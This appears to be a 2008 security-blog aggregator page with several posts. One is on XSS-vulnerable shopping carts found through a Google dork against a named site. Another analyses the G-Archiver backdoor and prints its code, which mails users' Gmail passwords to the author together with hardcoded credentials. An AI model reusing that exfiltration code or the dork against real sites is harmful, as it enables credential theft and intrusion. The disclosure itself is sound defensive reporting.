[SecurityRatty] tag: browse

Hype Alert: Internet Shopping Carts Are Secure

Fri, 26 Sep 2008 11:00:00 +0000

My blog reader fed me a nugget today that set off my hype monitor, specifically a post entitled Internet Shopping Carts are Secure.
OMG...really?
To be fair, I realize the author is speaking from the eCommerce perspective, rather than that of an information security practitioner, but here's where the trouble begins:
"Shopping cart service providers have developed secure ecommerce shopping cart solutions for any business owner looking to enhance their current online store, or create a new one. Some ecommerce shopping cart solution providers are even receiving PABP (Payment Application Best Practice) certification which supports PCI compliance requirements for all businesses accepting credit card payments online."
This may be true in part, but it is by no means an all-inclusive claim. Shopping carts continue to be sieve-like, even when apparently reviewed per PCI standards.
Allow me to elaborate.
We'll kick off our hype eliminating effort with a simple Google dork: inurl:"cart.cfm" (picking on ColdFusion again, but man, they make it easy)
GM Parts Direct: Your Shopping Cart jumped right out at me for a number of reasons.
First, I sensed XSS vulns lurking like a Geiger counter senses radiation. Sound effect for edification. :-)
Second, the page contained one of the growing number of aforementioned conversion-driving website security seals.

Tick, tick, click...the Gieger counter is getting louder.
Trustwave claims that the site operator "is enrolled in Trustwave's Trusted Commerce™ program to validate compliance with the Payment Card Industry Data Security Standard (PCI DSS) mandated by all the major credit card associations including: American Express, Diners Club, Discover, JCB, MasterCard Worldwide, Visa, Inc. and Visa Europe."
Methinks that Trustwave's Trusted Commerce program is missing a few fundamental security checks. Remember, XSS in PCI regulated sites, according to the PCI DSS, indicates that a site is not compliant (see section 6.5.4) if vulnerable to XSS.
Uh-oh.

All it takes is a fake login page, as opposed to our friends at XSSED.com, and...well, you get the point.
Simply, this is one of an endless number of shopping cart not secure, and not PCI compliant. For shame. You need only browse the Holisticinfosec.org Advisories page to find multiple ecommerce platforms and shopping carts that are missing the mark. Trust me, these are a fraction of the problem.
ecommerce<>security
ecommerce<>SDL
ecommerce<>PCI
website security seal<>security
Sigh.

Zune Owners Get Free Wi-Fi at McDonald's

Mon, 15 Sep 2008 23:01:01 +0000

Microsoft signs three-year deal with Wayport for old and new Zune owners alike: This is a nice win for Zune users, Wayport, and McDonald's, each in their own way, and it's something Microsoft can simply write off as useful marketing--and a way to get people to try the latest models of their music player, which are being released on 16-September.

The Zune doesn't include a Web browser or any Internet focused features; it's not an iPod touch. But you can use Wi-Fi to browse the Zune Marketplace for music and games, and download new songs in programmed channels, music selections created by a variety of artists and stations. Zune offers both music purchases and a subscription for unlimited music listening. The new models range from $149 for an 8 GB flash model to $249 for a 120 GB hard drive-based player.

The feature I'm most interested in is Buy from FM, which leverages the built-in FM tuner and very low-bandwidth data that's already pushed over analog AM/FM. (See my write-up of this feature from last week.) With Buy from FM, when you're listening to radio stations that participate, you'll be able to click a button and buy the song you're listening to if you're connected to a Wi-Fi network. Zune Pass subscribers can download the song at no additional charge. If there's no Wi-Fi network, the song download or purchase is queued.

Wayport's marketing head Dan Lowden said, "Obviously, it's cool because folks who already own a Zune device and just need to do an upgrade will be able to use this just as with any of the new Zune devices that they start selling as soon as possible." (Microsoft may have a little accounting work to do: Sarbanes-Oxley doesn't let you enhance a product in the market without a fee if you realize the revenue all at once.)

The benefit for Wayport is to have yet another hefty but undisclosed fixed sum underlying its fixed infrastructure costs. In the past, Wayport has done deals with Nintendo, ZipIt, and Eye-Fi to allow all devices in a category unlimited access at McDonald's locations. McDonald's obviously gets more customers, or existing customers who spend more time or visit more frequently.

A partnership with a hotspot operator means that Microsoft doesn't have to provide tools and their users endure frustration in joining a network. "We're experts enabling one click to get this network connected," Lowden said. He noted that Wayport has opened test labs to work with manufacturers in Japan, San Francisco, San Diego, and Seattle. "We're working with these guys from day 1 to make sure it's one click to get connected," he said. I'd also note that San Diego happens to be where Qualcomm's headquarters are located, not that Lowden gave me any tip-off there.

And I have to just say: burn, burn, burn on Apple. Despite Apple partnership with AT&T, which relies on Wayport to operate the AT&T-branded hotspot network and resells access to Wayport's own network, iPhone and iPod touch users have no inclusive Wi-Fi service. AT&T slipped a few times and ostensibly opened up their network or released details that iPhone users would gain free hotspot access--like all AT&T's fiber and all its standard and premium DSL customers.

As Wi-Fi becomes an expected part of any handheld gadget, the venues in which Wi-Fi is used multiply beyond cafes and hotels. Lifestyle locations--which could be clothing stores, nightclubs, ski resorts, and the tops of mountains suddenly become places where people want the same kind of access they have at home. Ultima thule is already unwired.

Testin the best AntiSpyware is no jest!

Thu, 07 Aug 2008 09:30:29 +0000

Found a great article this morning by the guy who has this website.
Im very impressed with the info offered at his site. Take the time to browse his material.

clipped from www.spyware-refuge.com

How I Tested the Best Spyware Programs

Determining the Best Spyware Programs Takes Time and Patience

Today, there is nearly 100 different products available online and in stores promising to remove spyware and adware, while preventing identity theft and securing your computer.

Did you know that some of these products are themselves spyware concealed behind a fictitious program? Or, in many cases work so poorly that they provide little to no protection?

Eight Steps to Responsible Surfing

Wed, 06 Aug 2008 20:30:41 +0000

Web threats and attacks will continue to evolve, but surfers can protect themselves against the majority of malicious code by following eight different steps. To provide the greatest degree of security, surfers cannot rely entirely on technology, and should also address the behavioral issues that are most likely to create risky situations.

Changing Behavior

The safest way to deal with a danger is avoidance. By surfing safely and adapting offline sensibilities online, surfers can greatly reduce their danger of exposure to malware.

1. Educate yourself.
At least every 6 to 12 months, surfers should browse the educational information provided by their operating system and security vendors and subscribe to any security-related newsletters they might offer. According to David Perry, familiarity with the latest threats, dangers, and recommended safety tips will allow surfers to make safe choices. “Until you know what’s out there, you’re just flying blind. Without an education, you’re wide open”.
2. Avoid suspect sites.
While criminals can infect even mainstream Web sites, sites such as gambling sites, adult Internet sites, and illegal file-sharing sites are far more likely to carry malicious code. Web sites that offer “something for nothing” frequently recoup their losses by infecting visitors’ PCs.
3. Lose Your Comfort Zone.

Web surfers should migrate their offline precautions to their online experience. By beginning with an attitude of healthy skepticism and only doing business with trusted Web sites, surfers can bypass a good deal of risk.

Recommended Technology

Despite the best precautions, every user will encounter Web-based malware. While no technology can guarantee protection against all attacks, a combination of preventive technologies provides the most comprehensive protection possible.

4. Use an updated virus scanning suite.
The most important component of any threat mitigation system is a virus scanning suite. In addition to detecting and removing known viruses and malware, modern virus scanning suites provide additional protections against new attacks by disabling their known protocols. For example, Trend Micro™ Internet Security encrypts keyboard traffic, protecting personal data from keyboard logging programs that might go unnoticed. Users should update their scanner and virus definitions as frequently as possible to ensure the best possible coverage.
5. Upgrade your OS and browser.
In addition to offering more features, Microsoft’s Internet Explorer version 7 and the latest Mozilla Firefox are both substantially more secure than previous-generation browsers. Users of older browsers should upgrade immediately to take advantage of increased security. Similarly, Windows Vista and Mac OS X are more secure than their predecessors, and users of older operating systems should consider upgrading, as well.
6. Disable scripting and “widgets.”
Many Web-based attacks use various scripting languages to run infectious programs in a browser or use downloadable “widgets” to execute infections locally. By disabling scripting and avoiding downloadable widgets wherever possible, surfers disable these common attack vectors.
7. Rate your Web pages.
Some available services rate the risk of Web pages in search results, allowing surfers to avoid unwanted content and hidden threats before viewing the pages. Rating applications (e.g., Trend Micro TrendProtect™) consume few system resources and run unobtrusively, so they are suitable for any Web-enabled personal computer.
8. Ask your provider.
Commerce companies, banks, and credit card associations are all interested in computer security, and many offer additional features. For example, Visa’s Verified By Visa program requires cardholders to enter a second password to identify themselves during a transaction, while businesses in Poland require cell-phone confirmation of credit card purchases. While nothing will be 100 percent effective, any additional security measure provided by a trusted source will increase protection, and surfers should adopt as many as possible.

This article provided for your reading pleasure by Trend Micro.

Kiva Update

Tue, 17 Jun 2008 05:21:07 +0000

About a year ago, we signed up for Kiva, which is a microlender. One of our first loans went to Sith Saron, who lives in Siem Reap Province in Cambodia. She needed a $1,000 for a cow, seeds, and a motorcycle for her farm.

Sith Saron is 37 years old and the mother of 7 children. She sells Khmer traditional cakes such as Num Korm, Num Bot, and Num Krouk to the people in her community and usually earns up to $4 each day. Her husband, meanwhile, works in his rice paddy growing crops as well as several kinds of vegetables. Two of her children are employed at a hotel, but the others are students.

The loan had a 18 month pay back date, and just a couple of weeks ago (about 10 months after taking out the loan), she paid the loan in full

Kiva is focused on serving the working poor

Kiva's mission is to connect people through lending for the sake of alleviating poverty.
Kiva is the world's first person-to-person micro-lending website, empowering individuals to lend directly to unique entrepreneurs in the developing world. The people you see on Kiva's site are real individuals in need of funding - not marketing material.
When you browse entrepreneurs' profiles on the site, choose someone to lend to, and then make a loan, you are helping a real person make great strides towards economic independence and improve life for themselves, their family, and their community. Throughout the course of the loan (usually 6-12 months), you can receive email journal updates and track repayments. Then, when you get your loan money back, you can relend to someone else in need.

I really like the last pay it forward part, so the lender can elect to take the money out of Kiva's system or loan it out again, in effect the last business is putting capital back into the system to help the next entrepreneur. Additionally, big props to Paypal which supports Kiva by acting as a transaction processor and waiving fees. What's all this mean? As Tom Barnett says:

everyone who wants to make a difference should just go ahead and get their own foreign policy and stop waiting on change from above.

I added the bold, because the bottom up tools that Kiva, Paypal and the Web give us are really unique, and really powerful to enable through microloans - entrepreuners who we may never meet in countries we may never go to be successful.

The Mother Of All Security Blogs

Wed, 14 May 2008 09:04:42 +0000

I read a lot of security blogs every day. It takes a lot of time and it's very inefficient. Wouldn't it be nice if someone consolidated a lot of security blogs into one so I could browse through them? Jose Nazario, Senior Security Researcher at Arbor Networks has done just this with his InfoSec Daily Blogs page. Nazario is well-known as an expert on Internet worms and is blogmaster of the Worm Blog as well. InfoSec Daily appears to read RSS feeds from other security blogs. You'll see some famous ones, like Bruce Schneier's blog, and lots of obscure ones you would otherwise miss, like this one. InfoSec Daily, being a blog, has it's own RSS feed, which I recently tried to subscribe to. I backed off because it's such a firehose. It's better-suited to web-surfing. Where it fails there is when someone posts a 5000 word blog entry which messes with the flow of reading. I look on InfoSec Daily as my catch-all for blogs I don't want to subscribe to on my own. And if I find I like something in there enough, I can subscribe to it myself.

So neighbors steal your wi-fi, kill the link or... have fun!

Tue, 01 Apr 2008 20:12:22 +0000

So you find out that everyone in on your block is using your network without your permission. Do you lock it down or...? Or maybe you want to have a little fun. A little creativity with squid and you could turn your everything they browse upside down (literally)

Mac OS X Security - Reality Check #2

Thu, 27 Mar 2008 18:43:20 +0000

First, let me express a caveat. I don't really care for "hack the box" contests. If a machine doesn't get hacked, it does not mean it isn't breakable. If it does get hacked, it just shows us what we already know - any machine can be broken under the right circumstances.

So, don't read too much into the PWN 2 OWN results. I don't.

Okay, having said that, given how obnoxious and misleading I find those Mac OS X ads and how they've spent millions of dollars publicly criticizing Windows Vista security improvements, I find it ironic and apropos that Mac OS X was the first machine to be owned in the PWN 2 OWN contest at CanSecWest today.

Read about it in LinuxWorld at: Gone in 2 minutes: Mac gets hacked first in contest.

Summary: Charlie Miller appears to have set up a web site containing malicious code and used a "browse to own" vulnerability to win the contest.

Give it a try, it may save you from ID Theft.

Sun, 23 Mar 2008 12:18:26 +0000

Aseem has a point in his article. Can you be too safe?
Im gonna try it out.

clipped from www.online-tech-tips.com

Browse the Internet safely using MyWOT

MyWOT is another free program that has a rating for millions of websites and that tries to keep you safe from Internet scams, shady online vendors, spam, spyware, and viruses. It never hurts to have more than one of these programs running at the same time, you never know when one service might have a website flagged before the other one does.

Backdoor in G-Archiver

Tue, 11 Mar 2008 11:02:11 +0000

Here is another data point that simple backdoors are being placed into free applications. A programmer, Dustin Brooks, was inspecting a free Gmail backup utility, called G-Archiver, with reflector and noticed that not only did it have the authors Gmail credentials baked in, but is was sending the Gmail credentials of every user of the program to the author.

This is an example of an unintended network activity backdoor where information leakage occurs. Here is the code:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add(”JTerry79@gmail.com”);
message.From = new MailAddress(”JTerry79@gmail.com”, “JTerry”, Encoding.UTF8);
message.Subject = “Account”;
message.SubjectEncoding = Encoding.UTF8;
message.Body = “Username: ” + a;
message.Body = message.Body + “\r\nPassword: ” + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential(”JTerry79@gmail.com”, “bilal482″);
client.Port = 0×24b;
client.Host = “smtp.gmail.com”;
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

This obviously wasn’t the smartest backdoor. The writer didn’t need to use the same credentials for for his “drop” account to send the mail. That made it trivial for the investigator to verify what was going on. There was also no attempt at obfuscation.

As a internet community we don’t have a good way yet of dealing with these problems except to hope that someone will inspect the free software at some point, alert people, and then hope that all the people that downloaded the software get contacted so that they can change their Gmail credentials. With other stolen data there is no recourse.

We are stuck in a blacklist mentality for software. People readily download, install, or increasingly often with SaaS, just browse, and type in their credential. Unless users are stopped by a blacklist tool or service they end up taking an unknown risk.